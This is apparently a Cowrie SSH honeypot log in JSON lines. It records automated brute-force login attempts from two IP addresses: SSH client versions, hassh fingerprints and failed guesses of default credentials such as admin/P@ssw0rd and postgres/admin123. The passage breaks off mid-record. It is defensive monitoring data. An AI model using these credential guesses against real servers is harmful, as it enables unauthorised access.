{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:45:59.828141Z","src_ip":"212.227.235.229","session":"f45f7ea4e46f"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:00.557890Z","src_ip":"212.227.125.160","session":"454bcde25351"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:01.093936Z","src_ip":"212.227.235.229","session":"f6b4ab7d9005"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46730,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e10eac387d3","protocol":"ssh","message":"New connection: 212.227.235.229:46730 (1.2.3.4:22) [session: 4e10eac387d3]","sensor":"my-vps","timestamp":"2025-08-31T04:46:02.841376Z"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:02.845865Z","src_ip":"212.227.235.229","session":"f6b4ab7d9005"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:03.120000Z","src_ip":"212.227.235.229","session":"4e10eac387d3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:03.151875Z","src_ip":"212.227.235.229","session":"4e10eac387d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35458,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e7208c8ec17","protocol":"ssh","message":"New connection: 212.227.125.160:35458 (1.2.3.4:22) [session: 9e7208c8ec17]","sensor":"my-vps","timestamp":"2025-08-31T04:46:05.583959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:05.584965Z","src_ip":"212.227.125.160","session":"9e7208c8ec17"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:05.598738Z","src_ip":"212.227.235.229","session":"4e10eac387d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:05.772341Z","src_ip":"212.227.125.160","session":"9e7208c8ec17"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:06.341993Z","src_ip":"212.227.125.160","session":"9e7208c8ec17"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"admin123","message":"login attempt [postgres/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:06.446010Z","src_ip":"212.227.235.229","session":"f45f7ea4e46f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34532,"dst_ip":"1.2.3.4","dst_port":22,"session":"d79e9b2b7fe9","protocol":"ssh","message":"New connection: 212.227.235.229:34532 (1.2.3.4:22) [session: d79e9b2b7fe9]","sensor":"my-vps","timestamp":"2025-08-31T04:46:06.538347Z"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:07.301107Z","src_ip":"212.227.235.229","session":"4e10eac387d3"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:07.531583Z","src_ip":"212.227.125.160","session":"9e7208c8ec17"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:07.655999Z","src_ip":"212.227.235.229","session":"d79e9b2b7fe9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:07.656708Z","src_ip":"212.227.235.229","session":"d79e9b2b7fe9"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:08.058383Z","src_ip":"212.227.235.229","session":"f45f7ea4e46f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41606,"dst_ip":"1.2.3.4","dst_port":22,"session":"4354e63e2ff2","protocol":"ssh","message":"New connection: 212.227.235.229:41606 (1.2.3.4:22) [session: 4354e63e2ff2]","sensor":"my-vps","timestamp":"2025-08-31T04:46:08.685345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:08.690149Z","src_ip":"212.227.235.229","session":"4354e63e2ff2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:08.948301Z","src_ip":"212.227.235.229","session":"4354e63e2ff2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47052,"dst_ip":"1.2.3.4","dst_port":22,"session":"4954b2ee9f1e","protocol":"ssh","message":"New connection: 212.227.235.229:47052 (1.2.3.4:22) [session: 4954b2ee9f1e]","sensor":"my-vps","timestamp":"2025-08-31T04:46:09.951578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:10.150801Z","src_ip":"212.227.235.229","session":"4954b2ee9f1e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd","message":"login attempt [admin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:10.849801Z","src_ip":"212.227.235.229","session":"4354e63e2ff2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43376,"dst_ip":"1.2.3.4","dst_port":22,"session":"4909597da84d","protocol":"ssh","message":"New connection: 212.227.125.160:43376 (1.2.3.4:22) [session: 4909597da84d]","sensor":"my-vps","timestamp":"2025-08-31T04:46:10.881526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:10.882416Z","src_ip":"212.227.125.160","session":"4909597da84d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:11.071657Z","src_ip":"212.227.125.160","session":"4909597da84d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:11.241927Z","src_ip":"212.227.235.229","session":"4954b2ee9f1e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:11.641235Z","src_ip":"212.227.125.160","session":"4909597da84d"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:12.131627Z","src_ip":"212.227.235.229","session":"4354e63e2ff2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:12.831945Z","src_ip":"212.227.125.160","session":"4909597da84d"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:13.694818Z","src_ip":"212.227.235.229","session":"d79e9b2b7fe9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47078,"dst_ip":"1.2.3.4","dst_port":22,"session":"da4a90c4e464","protocol":"ssh","message":"New connection: 212.227.235.229:47078 (1.2.3.4:22) [session: da4a90c4e464]","sensor":"my-vps","timestamp":"2025-08-31T04:46:15.608081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:15.624985Z","src_ip":"212.227.235.229","session":"da4a90c4e464"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512",